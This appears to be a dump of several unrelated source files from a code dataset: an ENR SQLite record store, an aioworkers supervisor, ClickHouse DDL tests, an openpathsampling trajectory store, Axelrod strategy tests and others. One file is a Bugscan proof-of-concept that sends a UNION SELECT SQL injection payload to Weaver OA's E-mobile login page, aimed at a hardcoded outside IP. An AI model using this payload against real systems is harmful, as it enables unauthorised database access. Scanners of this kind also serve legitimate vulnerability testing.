"SELECT name FROM sqlite_master WHERE type='table' AND name=?", ("field",)
).fetchone()
is not None
)
if record_table_exists and field_table_exists:
return
with conn:
conn.execute(RECORD_CREATE_STATEMENT)
conn.commit()
for statement in RECORD_INDEXES_AND_CONSTRAINTS:
conn.execute(statement)
conn.commit()
conn.execute(FIELD_CREATE_STATEMENT)
conn.commit()
for statement in FIELD_INDEXES_AND_CONSTRAINTS:
conn.execute(statement)
conn.commit()
def _encode_enr_value(key: bytes, value: Union[int, bytes]) -> bytes:
try:
sedes = ENR_KEY_SEDES_MAPPING[key]
except KeyError:
if isinstance(value, bytes):
return value
else:
raise TypeError(f"Cannot store non-bytes value: {type(value)}")
else:
try:
return rlp.encode(value, sedes=sedes) # type: ignore
except SerializationError:
if isinstance(value, bytes):
return value
else:
raise
def _decode_enr_value(key: bytes, raw: bytes) -> Union[int, bytes]:
try:
sedes = ENR_KEY_SEDES_MAPPING[key]
except KeyError:
return raw
else:
try:
return rlp.decode(raw, sedes=sedes) # type: ignore
except (DeserializationError, DecodingError):
return raw
class Field(NamedTuple):
node_id: NodeID
sequence_number: int
key: bytes
value: bytes
@classmethod
def from_row(cls, row: Tuple[bytes, int, bytes, bytes]) -> "Field":
(
raw_node_id,
sequence_number,
key,
value,
) = row
return cls(
node_id=NodeID(raw_node_id),
sequence_number=sequence_number,
key=key,
value=value,
)
def to_database_params(self) -> Tuple[NodeID, int, bytes, bytes]:
return (
self.node_id,
self.sequence_number,
self.key,
self.value,
)
DB_DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
class Record(NamedTuple):
node_id: NodeID
sequence_number: int
signature: bytes
created_at: datetime.datetime
fields: Tuple[Field, ...]
@classmethod
def from_enr(cls, enr: ENRAPI) -> "Record":
fields = tuple(
sorted(
(
Field(
node_id=enr.node_id,
sequence_number=enr.sequence_number,
key=key,
value=_encode_enr_value(key, value),
)
for key, value in enr.items()
),
key=operator.attrgetter("key"),
)
)
return cls(
node_id=enr.node_id,
sequence_number=enr.sequence_number,
signature=enr.signature,
created_at=datetime.datetime.utcnow(),
fields=fields,
)
def to_enr(self) -> ENRAPI:
kv_pairs = {
field.key: _decode_enr_value(field.key, field.value)
for field in self.fields
}
return ENR(
sequence_number=self.sequence_number,
kv_pairs=kv_pairs,
signature=self.signature,
)
@classmethod
def from_row(
cls, row: Tuple[bytes, int, bytes, str], fields: Collection[Field]
) -> "Record":
(
raw_node_id,
sequence_number,
signature,
raw_created_at,
) = row
return cls(
node_id=NodeID(raw_node_id),
sequence_number=sequence_number,
signature=signature,
created_at=datetime.datetime.strptime(raw_created_at, DB_DATETIME_FORMAT),
fields=tuple(sorted(fields, key=operator.attrgetter("key"))),
)
def to_database_params(self) -> Tuple[NodeID, int, int, bytes, str]:
return (
self.node_id,
            # High-order bits of the node_id (top 63, so it fits a signed 64-bit SQLite INTEGER) for proximity queries
int.from_bytes(self.node_id, "big") >> 193,
self.sequence_number,
self.signature,
self.created_at.isoformat(sep=" "),
)
RECORD_INSERT_QUERY = "INSERT INTO record (node_id, short_node_id, sequence_number, signature, created_at) VALUES (?, ?, ?, ?, ?)" # noqa: E501
FIELD_INSERT_QUERY = (
'INSERT INTO field (node_id, sequence_number, "key", value) VALUES (?, ?, ?, ?)'
)
def insert_record(conn: sqlite3.Connection, record: Record) -> None:
with conn:
conn.execute(RECORD_INSERT_QUERY, record.to_database_params())
field_params = tuple(field.to_database_params() for field in record.fields)
conn.executemany(FIELD_INSERT_QUERY, field_params)
RECORD_GET_QUERY = """SELECT
record.node_id AS record_node_id,
record.sequence_number AS record_sequence_number,
record.signature AS record_signature,
record.created_at AS record_created_at
FROM record
WHERE record.node_id = ?
ORDER BY record.sequence_number DESC
LIMIT 1
"""
FIELD_GET_QUERY = """SELECT
field.node_id AS field_node_id,
field.sequence_number AS field_sequence_number,
field."key" AS field_key,
field.value AS field_value
FROM field
WHERE ? = field.node_id AND ? = field.sequence_number
"""
class RecordNotFound(Exception):
pass
def get_record(conn: sqlite3.Connection, node_id: NodeID) -> Record:
record_row = conn.execute(RECORD_GET_QUERY, (node_id,)).fetchone()
if record_row is None:
raise RecordNotFound(f"No record found: node_id={node_id.hex()}")
field_rows = conn.execute(FIELD_GET_QUERY, (node_id, record_row[1])).fetchall()
fields = tuple(Field.from_row(row) for row in field_rows)
record = Record.from_row(row=record_row, fields=fields)
return record
RECORD_GET_AT_SEQUENCE_NUMBER_QUERY = """SELECT
record.node_id AS record_node_id,
record.sequence_number AS record_sequence_number,
record.signature AS record_signature,
record.created_at AS record_created_at
FROM record
WHERE record.node_id = ? AND record.sequence_number == ?
ORDER BY record.sequence_number DESC
LIMIT 1
"""
def get_record_at_sequence_number(
conn: sqlite3.Connection, node_id: NodeID, sequence_number: int
) -> Record:
record_row = conn.execute(
RECORD_GET_AT_SEQUENCE_NUMBER_QUERY, (node_id, sequence_number)
).fetchone()
if record_row is None:
raise RecordNotFound(f"No record found: node_id={node_id.hex()}")
field_rows = conn.execute(FIELD_GET_QUERY, (node_id, sequence_number)).fetchall()
fields = tuple(Field.from_row(row) for row in field_rows)
record = Record.from_row(row=record_row, fields=fields)
return record
DELETE_RECORD_QUERY = """DELETE FROM record WHERE record.node_id = ?"""
DELETE_FIELD_QUERY = """DELETE FROM field WHERE field.node_id = ?"""
def delete_record(conn: sqlite3.Connection, node_id: NodeID) -> int:
with conn:
cursor = conn.execute(DELETE_RECORD_QUERY, (node_id,))
conn.execute(DELETE_FIELD_QUERY, (node_id,))
return cursor.rowcount # type: ignore
BASE_QUERY = """SELECT
record.node_id AS record_node_id,
record.sequence_number AS record_sequence_number,
record.signature AS record_signature,
record.created_at AS record_created_at
FROM record
INNER JOIN (
SELECT
record.node_id,
record.sequence_number,
MAX(record.sequence_number)
FROM record
GROUP BY record.node_id
) latest_record
ON
record.node_id == latest_record.node_id AND
record.sequence_number == latest_record.sequence_number
JOIN field
ON
record.node_id = field.node_id AND
record.sequence_number = field.sequence_number
{where_statements}
GROUP BY record.node_id
{order_by_statement}
"""
PROXIMATE_ORDER_BY_CLAUSE = """
ORDER BY ((?{PARAM_IDX} | record.short_node_id) - (?{PARAM_IDX} & record.short_node_id))
"""
EXISTS_CLAUSE = """EXISTS (
SELECT 1
FROM field
WHERE
record.node_id = field.node_id
AND record.sequence_number = field.sequence_number AND field."key" = ?
)
"""
def query_records(
conn: sqlite3.Connection,
required_keys: Sequence[bytes] = (),
order_closest_to: Optional[NodeID] = None,
) -> Iterable[Record]:
num_required_keys = len(required_keys)
if num_required_keys == 0:
where_clause = ""
elif num_required_keys == 1:
where_clause = f"WHERE {EXISTS_CLAUSE}"
else:
query_components = tuple([f"({EXISTS_CLAUSE})"] * num_required_keys)
combined_query_components = " AND ".join(query_components)
where_clause = f"WHERE {combined_query_components}"
if order_closest_to is None:
order_by_clause = ""
params = tuple(required_keys)
else:
order_by_clause = PROXIMATE_ORDER_BY_CLAUSE.format(
PARAM_IDX=num_required_keys + 1
)
short_node_id = int.from_bytes(order_closest_to, "big") >> 193
params = tuple(required_keys) + (short_node_id,)
query = BASE_QUERY.format(
where_statements=where_clause, order_by_statement=order_by_clause
)
logger.debug("query_records: query=%s params=%r", query, params)
for record_row in conn.execute(query, params):
node_id, sequence_number, *_ = record_row
field_rows = conn.execute(FIELD_GET_QUERY, (node_id, sequence_number))
fields = tuple(Field.from_row(row) for row in field_rows.fetchall())
record = Record.from_row(record_row, fields=fields)
yield record
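# Usage sketch (not part of the original module). _ExampleENR is a hand-rolled stand-in
# exposing only the attributes Record.from_enr() reads; real code would use a properly
# signed ENR decoded elsewhere.
if __name__ == "__main__":
    class _ExampleENR:
        node_id = NodeID(b"\x01" * 32)
        sequence_number = 1
        signature = b"\x00" * 64

        @staticmethod
        def items():
            return ((b"id", b"v4"),)

    conn = sqlite3.connect(":memory:")
    create_tables(conn)
    insert_record(conn, Record.from_enr(_ExampleENR()))
    print(get_record(conn, _ExampleENR.node_id))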
| 29.724936
| 144
| 0.644469
|
6d3ed99e9ef9084eb5840963c001badf6b15792a
| 836
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-955.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-955.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-955.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#__author__ = '1c3z'
#ref http://www.wooyun.org/bugs/wooyun-2015-0105520
def assign(service, arg):
if service == "weaver_oa":
return True, arg
def audit(url):
payload = '''{"auths":[{"value":"-1%27%20UNION%20SELECT%201,2,md5(1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}'''
url += 'E-mobile/Data/login_other.php?diff=sync&auth='
url += payload
code, head,res, errcode, _ = curl.curl2(url)
if 'c4ca4238a0b923820dcc' in res:
security_hole(url)
if 'mysql_fetch_assoc' in res:
security_warning(url)
if __name__ == '__main__':
from dummy import *
audit(assign('weaver_oa', 'http://122.224.149.30:8082/')[1])
| 33.44
| 221
| 0.61244
|
0d0ca704097c712a9838afef51e6daa1b956643f
| 3,741
|
py
|
Python
|
aioworkers/worker/supervisor.py
|
aioworkers/aioworkers
|
51f15924698df4fe13d777d66ed70c7f34f09c3a
|
[
"Apache-2.0"
] | 45
|
2017-04-26T23:50:30.000Z
|
2021-12-29T03:21:06.000Z
|
aioworkers/worker/supervisor.py
|
aioworkers/aioworkers
|
51f15924698df4fe13d777d66ed70c7f34f09c3a
|
[
"Apache-2.0"
] | 63
|
2017-08-01T10:35:45.000Z
|
2022-03-01T18:07:49.000Z
|
aioworkers/worker/supervisor.py
|
aioworkers/aioworkers
|
51f15924698df4fe13d777d66ed70c7f34f09c3a
|
[
"Apache-2.0"
] | 6
|
2017-10-19T08:21:23.000Z
|
2021-12-29T03:25:32.000Z
|
import asyncio
import logging
import random
from .base import Worker
logger = logging.getLogger(__name__)
class Supervisor(Worker):
"""
config:
children: Union[int, list[str], list[dict]] - count or list
child: Mapping - config for child worker
"""
def __init__(self, *args, **kwargs):
self._children = {}
super().__init__(*args, **kwargs)
def __getattr__(self, item):
return self._children[item]
def __getitem__(self, item):
return self._children[item]
async def init(self):
children = [super()]
for p in self._gen_child_params():
name = p['name']
if name in self._children:
raise RuntimeError('Duplicate child name %s' % name)
child = self.create_child(p)
self._children[name] = child
children.append(child)
await self._wait(lambda w: w.init(), children)
def _wait(self, lmbd, children=()):
children = children or self._children.values()
return self.context.wait_all([lmbd(w) for w in children])
def __call__(self, *args, **kwargs):
if self.input is None:
vs = random.choice(list(self._children.values()))
return vs(*args, **kwargs)
else:
return self.input.put(*args, **kwargs)
def _gen_child_params(self):
children = self.config.children
if isinstance(children, int):
for i in range(children):
yield {'name': 'child' + str(i)}
elif isinstance(children, list):
for i in children:
if isinstance(i, str):
yield {'name': i}
elif isinstance(i, dict):
yield i
else:
raise RuntimeError('Unexpected type of parameter %s', i)
else:
raise RuntimeError('Unexpected type of parameter children')
def get_child_config(self, *args, **kwargs):
return self.config.child.new_child(*args, **kwargs)
def create_child(self, *args, **kwargs):
conf = self.get_child_config(*args, **kwargs)
add = {}
if not conf.get('input') and self.input is not None:
add['input'] = self.name
if not conf.get('output') and self.output is not None:
add['output'] = self.name
cls = conf.get_obj('cls')
add['name'] = '.'.join([self.name, conf.get('name', 'child')])
if add:
conf = conf.new_child(add)
return cls(conf, context=self.context, loop=self.loop)
async def get(self):
return await self.input.get()
async def put(self, *args, **kwargs):
return await self.output.put(*args, **kwargs)
async def work(self):
children = list(self._children.values())
if self._persist:
then = asyncio.FIRST_EXCEPTION
else:
then = asyncio.ALL_COMPLETED
while self._children:
await self._wait(lambda w: w.start(), children)
d, p = await asyncio.wait(
[i._future for i in self._children.values()],
loop=self.loop, return_when=then)
if not self._persist:
break
await asyncio.sleep(1, loop=self.loop)
children = [i for i in self._children.values() if i._future in d]
async def stop(self, force=False):
await super().stop(force=True)
await self._wait(lambda w: w.stop(force=force))
async def status(self):
status = await super().status()
status['children'] = {}
for name, w in self._children.items():
status['children'][name] = await w.status()
return status
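# Configuration sketch (not part of the original module). The key names mirror the
# class docstring above; the child worker class path and the child names are
# hypothetical examples.
EXAMPLE_SUPERVISOR_CONFIG = {
    "cls": "aioworkers.worker.supervisor.Supervisor",
    "children": ["fetcher", "parser", "writer"],  # or an int to spawn N identical children
    "child": {
        "cls": "myapp.workers.Child",  # hypothetical child worker class
        "persist": True,
    },
}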
| 33.401786
| 77
| 0.566961
|
10b8b97ceeac8d2461a7770c1d389e0c2f52898b
| 1,449
|
py
|
Python
|
test/test_modify_contact.py
|
MaximM27/Pythonfortesting_trainig
|
07c283c4ac88fd2bb0ee81983abe8177a9b2eada
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
MaximM27/Pythonfortesting_trainig
|
07c283c4ac88fd2bb0ee81983abe8177a9b2eada
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
MaximM27/Pythonfortesting_trainig
|
07c283c4ac88fd2bb0ee81983abe8177a9b2eada
|
[
"Apache-2.0"
] | null | null | null |
from model.contact import Contact
import random
def test_modify_contact_firstname(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.add_contact(Contact(firstname="test"))
old_contacts = db.get_contact_list()
cont = random.choice(old_contacts)
cont_index = old_contacts.index(cont)
new_contact = Contact(firstname="New firstname")
new_contact.id = old_contacts[cont_index].id
new_contact.firstname = old_contacts[cont_index].firstname
new_contact.lastname = old_contacts[cont_index].lastname
new_contact.middlename = old_contacts[cont_index].middlename
app.contact.modify_contact_by_id(new_contact.id, new_contact)
new_contacts = db.get_contact_list()
assert len(old_contacts) == len(new_contacts)
old_contacts.remove(cont)
old_contacts.append(new_contact)
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
#def test_modify_first_contact_lastname(app):
# if app.contact.count() == 0:
# app.contact.add_contact(Contact(lastname="test"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(lastname="New lastname"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts) == len(new_contacts)
| 43.909091
| 123
| 0.752243
|
c507b9f6bd9fdff35c4afd95a0a02d8ea48a0938
| 6,292
|
py
|
Python
|
tests/test_ddl.py
|
athre0z/clickhouse-sqlalchemy
|
d4be4a818c2fadef8eeb76a59d11ff82fc2c433a
|
[
"MIT"
] | 1
|
2021-07-07T09:06:00.000Z
|
2021-07-07T09:06:00.000Z
|
tests/test_ddl.py
|
athre0z/clickhouse-sqlalchemy
|
d4be4a818c2fadef8eeb76a59d11ff82fc2c433a
|
[
"MIT"
] | null | null | null |
tests/test_ddl.py
|
athre0z/clickhouse-sqlalchemy
|
d4be4a818c2fadef8eeb76a59d11ff82fc2c433a
|
[
"MIT"
] | null | null | null |
from sqlalchemy import Column
from sqlalchemy.sql.ddl import CreateTable
from clickhouse_sqlalchemy import types, engines, Table
from clickhouse_sqlalchemy.sql.ddl import DropTable
from tests.testcase import BaseTestCase
from tests.session import mocked_engine
class DDLTestCase(BaseTestCase):
def test_create_table(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.String),
Column('z', types.String(10)),
# Must be quoted:
Column('index', types.String),
engines.Memory()
)
        # No NOT NULL constraints and no PRIMARY KEY clause are emitted.
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 ('
'x Int32, y String, z FixedString(10), "index" String) '
'ENGINE = Memory'
)
def test_create_table_nested_types(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.String)),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(String)) '
'ENGINE = Memory'
)
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.Array(types.String))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(Array(String))) '
'ENGINE = Memory'
)
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.Array(types.String))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(Array(String))) '
'ENGINE = Memory'
)
def test_create_table_nullable(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Nullable(types.String)),
Column('z', types.Nullable(types.String(10))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Nullable(String), z Nullable(FixedString(10))) '
'ENGINE = Memory'
)
def test_create_table_nested(self):
table = Table(
't1',
self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('parent', types.Nested(
Column('child1', types.Int32),
Column('child2', types.String),
)),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 ('
'x Int32, '
'parent Nested('
'child1 Int32, '
"child2 String"
')'
') ENGINE = Memory'
)
def test_create_table_nested_nullable(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.Nullable(types.String))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(Nullable(String))) '
'ENGINE = Memory'
)
def test_create_table_nullable_nested_nullable(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Nullable(
types.Array(types.Nullable(types.String)))
),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Nullable(Array(Nullable(String)))) '
'ENGINE = Memory'
)
def test_table_create_on_cluster(self):
create_sql = (
'CREATE TABLE t1 ON CLUSTER test_cluster '
'(x Int32) ENGINE = Memory'
)
with mocked_engine() as engine:
table = Table(
't1', self.metadata(session=engine.session),
Column('x', types.Int32, primary_key=True),
engines.Memory(),
clickhouse_cluster='test_cluster'
)
table.create()
self.assertEqual(engine.history, [create_sql])
self.assertEqual(
self.compile(CreateTable(table)),
create_sql
)
def test_drop_table_clause(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True)
)
self.assertEqual(
self.compile(DropTable(table)),
'DROP TABLE t1'
)
self.assertEqual(
self.compile(DropTable(table, if_exists=True)),
'DROP TABLE IF EXISTS t1'
)
def test_table_drop(self):
with mocked_engine() as engine:
table = Table(
't1', self.metadata(session=engine.session),
Column('x', types.Int32, primary_key=True)
)
table.drop(if_exists=True)
self.assertEqual(engine.history, ['DROP TABLE IF EXISTS t1'])
def test_table_drop_on_cluster(self):
drop_sql = 'DROP TABLE IF EXISTS t1 ON CLUSTER test_cluster'
with mocked_engine() as engine:
table = Table(
't1', self.metadata(session=engine.session),
Column('x', types.Int32, primary_key=True),
clickhouse_cluster='test_cluster'
)
table.drop(if_exists=True)
self.assertEqual(engine.history, [drop_sql])
self.assertEqual(
self.compile(DropTable(table, if_exists=True)),
drop_sql
)
| 30.692683
| 73
| 0.523999
|
3399e10fe8944dc9c416730e70108fdf8b6f2e39
| 3,542
|
py
|
Python
|
openpathsampling/storage/stores/trajectory.py
|
bolhuis/openpathsampling
|
4a12af0ee1143cdbc272b10a8c7cbea735566ce1
|
[
"MIT"
] | 64
|
2016-07-06T13:38:51.000Z
|
2022-03-30T15:58:01.000Z
|
openpathsampling/storage/stores/trajectory.py
|
bolhuis/openpathsampling
|
4a12af0ee1143cdbc272b10a8c7cbea735566ce1
|
[
"MIT"
] | 601
|
2016-06-13T10:22:01.000Z
|
2022-03-25T00:10:40.000Z
|
openpathsampling/storage/stores/trajectory.py
|
hejung/openpathsampling
|
e8b091c92916561954542d40d17d7241b203d1ad
|
[
"MIT"
] | 45
|
2016-11-10T11:17:53.000Z
|
2022-02-13T11:50:26.000Z
|
from openpathsampling.engines.trajectory import Trajectory
from openpathsampling.netcdfplus import ObjectStore, LoaderProxy
class TrajectoryStore(ObjectStore):
def __init__(self):
super(TrajectoryStore, self).__init__(Trajectory)
def to_dict(self):
return {}
def _save(self, trajectory, idx):
self.vars['snapshots'][idx] = trajectory
store = self.storage.snapshots
for frame, snapshot in enumerate(trajectory.iter_proxies()):
if type(snapshot) is not LoaderProxy:
loader = store.proxy(snapshot)
trajectory[frame] = loader
def mention(self, trajectory):
"""
        Save a trajectory, storing its snapshots only shallowly.
        This will mention the ids of all snapshots in the file but not save
        the content of the snapshots themselves. This way you can still store
        CV values if you want.
Parameters
----------
trajectory : :class:`openpathsampling.Trajectory`
"""
snap_store = self.storage.snapshots
current_mention = snap_store.only_mention
snap_store.only_mention = True
self.save(trajectory)
snap_store.only_mention = current_mention
def _load(self, idx):
trajectory = Trajectory(self.vars['snapshots'][idx])
return trajectory
def cache_all(self):
"""Load all samples as fast as possible into the cache
"""
if not self._cached_all:
idxs = range(len(self))
snaps = self.vars['snapshots'][:]
[self.add_single_to_cache(i, j) for i, j in zip(
idxs,
snaps)]
self._cached_all = True
def add_single_to_cache(self, idx, snaps):
"""
        Add a single trajectory to the cache
Parameters
----------
idx : int
the index where the object was stored
snaps : list of `BaseSnapshot`
            the snapshots that make up the stored trajectory
"""
if idx not in self.cache:
obj = Trajectory(snaps)
self._get_id(idx, obj)
self.cache[idx] = obj
self.index[obj.__uuid__] = idx
return obj
def snapshot_indices(self, idx):
"""
Load snapshot indices for trajectory with ID 'idx' from the storage
Parameters
----------
idx : int
ID of the trajectory
Returns
-------
list of int
trajectory indices
"""
# get the values
return self.variables['snapshots'][idx].tolist()
def iter_snapshot_indices(self):
"""
Return an iterator over the lists of snapshot indices for all
trajectories in the storage
Returns
-------
Iterator
the iterator
"""
for snap_idx in range(len(self)):
yield self.snapshot_indices(snap_idx)
def initialize(self, units=None):
super(TrajectoryStore, self).initialize()
# index associated storage in class variable for all Trajectory
# instances to access
self.create_variable(
'snapshots',
'lazyobj.snapshots',
dimensions=('...',),
            description="trajectory[trajectory][frame] is the snapshot index "
                        "(0..nsnapshots-1) of frame 'frame' of trajectory "
                        "'trajectory'.",
chunksizes=(65536,)
)
| 27.671875
| 80
| 0.573687
|
4420ba3336da945314618164cc4c689e8e05d28e
| 4,226
|
py
|
Python
|
axelrod/tests/unit/test_apavlov.py
|
mattshirtliffe/Axelrod
|
367a787e16541fda6e6076200805f5bb6a863973
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_apavlov.py
|
mattshirtliffe/Axelrod
|
367a787e16541fda6e6076200805f5bb6a863973
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_apavlov.py
|
mattshirtliffe/Axelrod
|
367a787e16541fda6e6076200805f5bb6a863973
|
[
"MIT"
] | 1
|
2018-10-07T19:07:18.000Z
|
2018-10-07T19:07:18.000Z
|
"""Test APavlov."""
import axelrod
from .test_player import TestPlayer
C, D = axelrod.Actions.C, axelrod.Actions.D
class TestAPavlov2006(TestPlayer):
name = "Adapative Pavlov 2006"
player = axelrod.APavlov2006
expected_classifier = {
'memory_depth': float('inf'),
'stochastic': False,
'makes_use_of': set(),
'long_run_time': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_strategy(self):
self.first_play_test(C)
self.responses_test([C] * 6, [C] * 6, [C],
attrs={"opponent_class": "Cooperative"})
self.responses_test([C, D, D, D, D, D], [D] * 6, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, D, C, D, C, D], [D, C, D, C, D, C], [C, C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, D, D, C, D, D], [D, D, C, D, D, C], [D],
attrs={"opponent_class": "PavlovD"})
self.responses_test([C, D, D, C, D, D, C], [D, D, C, D, D, C, D], [C],
attrs={"opponent_class": "PavlovD"})
self.responses_test([C, D, D, C, D, D], [C, C, C, D, D, D], [D],
attrs={"opponent_class": "Random"})
self.responses_test([C, D, D, D, C, C], [D, D, D, C, C, C], [D],
attrs={"opponent_class": "Random"})
def test_reset(self):
player = self.player()
opponent = axelrod.Cooperator()
[player.play(opponent) for _ in range(10)]
player.reset()
self.assertEqual(player.opponent_class, None)
class TestAPavlov2011(TestPlayer):
name = "Adapative Pavlov 2011"
player = axelrod.APavlov2011
expected_classifier = {
'memory_depth': float('inf'),
'stochastic': False,
'makes_use_of': set(),
'long_run_time': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_strategy(self):
self.first_play_test(C)
self.responses_test([C] * 6, [C] * 6, [C],
attrs={"opponent_class": "Cooperative"})
self.responses_test([C, D, D, D, D, D], [D] * 6, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, D, D, D, D], [C] + [D] * 5, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, C, D, D, D], [C, C] + [D] * 4, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, D, D, C, D], [C, D, D, C, D, D], [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, D, D, D, C], [C, D, D, C, C, D], [C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, C, D, C, D, C], [C, D, C, D, C, D], [C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, D, D, D, C, C], [D, D, D, C, C, C], [C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, D, D, D, C, C], [D, D, D, C, C, C], [C],
attrs={"opponent_class": "STFT"})
# Specific case for STFT when responding with TFT
opponent = axelrod.Player()
player = axelrod.APavlov2006()
player.history = [D] * 8
opponent.history = [D] * 8
player.opponent_class = "STFT"
self.assertEqual(player.strategy(opponent), D)
opponent.history.append(C)
self.assertEqual(player.strategy(opponent), C)
self.responses_test([C, C, C, C, C, D], [C, C, C, C, D, D], [D],
attrs={"opponent_class": "Random"})
self.responses_test([C, D, D, C, C, C], [D, D, C, C, C, C], [D],
attrs={"opponent_class": "Random"})
def test_reset(self):
player = self.player()
opponent = axelrod.Cooperator()
[player.play(opponent) for _ in range(10)]
player.reset()
self.assertEqual(player.opponent_class, None)
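# --- Illustrative usage sketch (editor's addition, not part of the original test file) ---
# Outside of the TestPlayer harness, the strategies exercised above can be run
# directly. This assumes the library's Match runner is available in the version
# under test; the turn count of 10 is an arbitrary illustrative choice.
def _example_apavlov_match():
    players = (axelrod.APavlov2006(), axelrod.Cooperator())
    match = axelrod.Match(players, turns=10)
    interactions = match.play()
    print(interactions[:3])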
| 40.634615
| 78
| 0.50071
|
5621619cc777a3b4db6a913a48826947eb818eda
| 20,261
|
py
|
Python
|
lib/test/test_api_callable.py
|
boswald1/django-homepage
|
c6f956d26b6f986be98c25022e763075ebf12bb1
|
[
"BSD-3-Clause"
] | 1
|
2018-12-12T04:48:15.000Z
|
2018-12-12T04:48:15.000Z
|
test-docker/venv/lib/python2.7/site-packages/test/test_api_callable.py
|
hmit208/appengine-transcoder
|
d3f7a292dccae6478955ab1121989868594f4ed8
|
[
"Apache-2.0"
] | null | null | null |
test-docker/venv/lib/python2.7/site-packages/test/test_api_callable.py
|
hmit208/appengine-transcoder
|
d3f7a292dccae6478955ab1121989868594f4ed8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# pylint: disable=missing-docstring,no-self-use,no-init,invalid-name,protected-access
"""Unit tests for api_callable"""
from __future__ import absolute_import, division
import mock
import unittest2
from google.gax import (
api_callable, bundling, BackoffSettings, BundleDescriptor, BundleOptions,
CallSettings, CallOptions, INITIAL_PAGE, PageDescriptor, RetryOptions)
from google.gax.errors import GaxError, RetryError
